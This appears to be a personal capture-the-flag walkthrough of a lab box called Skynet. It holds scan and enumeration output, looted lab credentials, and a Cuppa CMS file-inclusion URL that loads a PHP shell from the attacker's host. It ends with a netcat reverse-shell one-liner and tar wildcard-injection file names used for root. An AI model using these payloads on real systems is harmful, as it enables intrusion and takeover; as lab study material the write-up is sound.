Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 20:53 CEST
Nmap scan report for 10.10.184.81
Host is up (0.037s latency).
Not shown: 994 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 992331bbb1e943b756944cb9e82146c5 (RSA)
|   256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_  256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL UIDL AUTH-RESP-CODE PIPELINING RESP-CODES TOP CAPA
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more post-login LOGINDISABLEDA0001 LOGIN-REFERRALS IDLE listed SASL-IR ID ENABLE capabilities LITERAL+ IMAP4rev1 OK Pre-login have
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/6%OT=22%CT=1%CU=41487%PV=Y%DS=2%DC=T%G=Y%TM=6456A233
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=104%GCD=2%ISR=10E%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 3s
| smb2-time: 
|   date: 2023-05-06T18:53:41
|_  start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2023-05-06T13:53:41-05:00

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   35.90 ms 10.9.0.1
2   35.95 ms 10.10.184.81

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.32 seconds


===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.184.81
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/05/06 20:54:37 Starting gobuster in directory enumeration mode
===============================================================
[2K/admin                (Status: 301) [Size: 312] [--> http://10.10.184.81/admin/]
[2K/css                  (Status: 301) [Size: 310] [--> http://10.10.184.81/css/]
[2K/js                   (Status: 301) [Size: 309] [--> http://10.10.184.81/js/]
[2K/config               (Status: 301) [Size: 313] [--> http://10.10.184.81/config/]
[2K/ai                   (Status: 301) [Size: 309] [--> http://10.10.184.81/ai/]
[2K/squirrelmail         (Status: 301) [Size: 319] [--> http://10.10.184.81/squirrelmail/]
[2K/server-status        (Status: 403) [Size: 277]



Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May  6 21:11:09 2023

[34m =========================================( [0m[32mTarget Information[0m[34m )=========================================

[0mTarget ........... 10.10.184.81
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


[34m ============================( [0m[32mEnumerating Workgroup/Domain on 10.10.184.81[0m[34m )============================

[0m[33m
[+] [0m[32mGot domain/workgroup name: WORKGROUP

[0m
[34m ================================( [0m[32mNbtstat Information for 10.10.184.81[0m[34m )================================

[0mLooking up status of 10.10.184.81
	SKYNET          <00> -         B <ACTIVE>  Workstation Service
	SKYNET          <03> -         B <ACTIVE>  Messenger Service
	SKYNET          <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

[34m ===================================( [0m[32mSession Check on 10.10.184.81[0m[34m )===================================

[0m[33m
[+] [0m[32mServer 10.10.184.81 allows sessions using username '', password ''

[0m
[34m ================================( [0m[32mGetting domain SID for 10.10.184.81[0m[34m )================================

[0mDomain Name: WORKGROUP
Domain Sid: (NULL SID)
[33m
[+] [0m[32mCan't determine if host is part of domain or part of a workgroup

[0m
[34m ===================================( [0m[32mOS information on 10.10.184.81[0m[34m )===================================

[0m[33m
[E] [0m[31mCan't get OS info with smbclient

[0m[33m
[+] [0m[32mGot OS info for 10.10.184.81 from srvinfo: 
[0m	SKYNET         Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03


[34m =======================================( [0m[32mUsers on 10.10.184.81[0m[34m )=======================================

[0mindex: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson	Name: 	Desc: 

user:[milesdyson] rid:[0x3e8]

[34m =================================( [0m[32mShare Enumeration on 10.10.184.81[0m[34m )=================================

[0m
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SKYNET
[33m
[+] [0m[32mAttempting to map shares on 10.10.184.81

[0m//10.10.184.81/print$	[35mMapping: [0mDENIED[35m Listing: [0mN/A[35m Writing: [0mN/A
//10.10.184.81/anonymous	[35mMapping: [0mOK[35m Listing: [0mOK[35m Writing: [0mN/A
//10.10.184.81/milesdyson	[35mMapping: [0mDENIED[35m Listing: [0mN/A[35m Writing: [0mN/A
[33m
[E] [0m[31mCan't understand response:

[0mNT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.184.81/IPC$	[35mMapping: [0mN/A[35m Listing: [0mN/A[35m Writing: [0mN/A

[34m ============================( [0m[32mPassword Policy Information for 10.10.184.81[0m[34m )============================

[0m

[+] Attaching to 10.10.184.81 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] SKYNET
	[+] Builtin

[+] Password Info for Domain: SKYNET

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[33m
[+] [0m[32mRetieved partial password policy with rpcclient:


[0mPassword Complexity: Disabled
Minimum Password Length: 5


[34m =======================================( [0m[32mGroups on 10.10.184.81[0m[34m )=======================================

[0m[33m
[+] [0m[32mGetting builtin groups:

[0m[33m
[+] [0m[32m Getting builtin group memberships:

[0m[33m
[+] [0m[32m Getting local groups:

[0m[33m
[+] [0m[32m Getting local group memberships:

[0m[33m
[+] [0m[32m Getting domain groups:

[0m[33m
[+] [0m[32m Getting domain group memberships:

[0m
[34m ==================( [0m[32mUsers on 10.10.184.81 via RID cycling (RIDS: 500-550,1000-1050)[0m[34m )==================

[0m[33m
[I] [0m[36mFound new SID: 
[0mS-1-22-1
[33m
[I] [0m[36mFound new SID: 
[0mS-1-5-32
[33m
[I] [0m[36mFound new SID: 
[0mS-1-5-32
[33m
[I] [0m[36mFound new SID: 
[0mS-1-5-32
[33m
[I] [0m[36mFound new SID: 
[0mS-1-5-32
[33m
[+] [0m[32mEnumerating users using SID S-1-5-32 and logon username '', password ''

[0mS-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[33m
[+] [0m[32mEnumerating users using SID S-1-22-1 and logon username '', password ''

[0mS-1-22-1-1001 Unix User\milesdyson (Local User)

===============================================================
2023/05/06 21:13:03 Finished
===============================================================
[33m
[+] [0m[32mEnumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''

[0mS-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)

[34m ===============================( [0m[32mGetting printer info for 10.10.184.81[0m[34m )===============================

[0mNo printers returned.


enum4linux complete on Sat May  6 21:14:04 2023


connected to the anonymous smb share with the command: smbclient //10.10.184.81/anonymous -p 445

downloaded a bunch of files including a password dictionary  

couldn't figure out how to set up hydra with redirects so i just logged into squirrel mail with the credentials:
milesdyson:cyborg007haloterminator

there is an smb password in there: )s{A&2Z=F^n_E.B`

logged into smb: smbclient //10.10.184.81/milesdyson -U milesdyson -p 445

got a file called important.txt which contained the hidden dirname: /45kra24zxs28v3yd

we have to enumerate that directory again to look for files and directories:

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.184.81/45kra24zxs28v3yd/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/05/06 21:58:01 Starting gobuster in directory enumeration mode
===============================================================
[2K/administrator        (Status: 301) [Size: 337] [--> http://10.10.184.81/45kra24zxs28v3yd/administrator/]

===============================================================
2023/05/06 22:03:23 Finished
===============================================================


accessing the /administrator directory we find a cuppa cms login page and there seems to be an LFI vulnerability for that

serving my PTM_shell.php with pythons http.server module i can upload it to the website visiting this link:
http://10.10.184.81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.58.163:8080/PTM_shell.php?

obviously i had to start listening on port 4444 first 

upgraded the reverse shell to a socat shell using the instructions in my res notes 

uploaded and ran linpeas for privesc

there is a script: /usr/bin/gettext.sh 

and another one: /home/milesdyson/backups/backup.sh

and an interesting entry in /etc/hosts: 127.0.1.1 skynet 

so apparently this is what you had to do to gain a root shell:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.163 4444 >/tmp/f" > shell.sh 
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" 
touch "/var/www/html/--checkpoint=1"

talk about "easy" btw
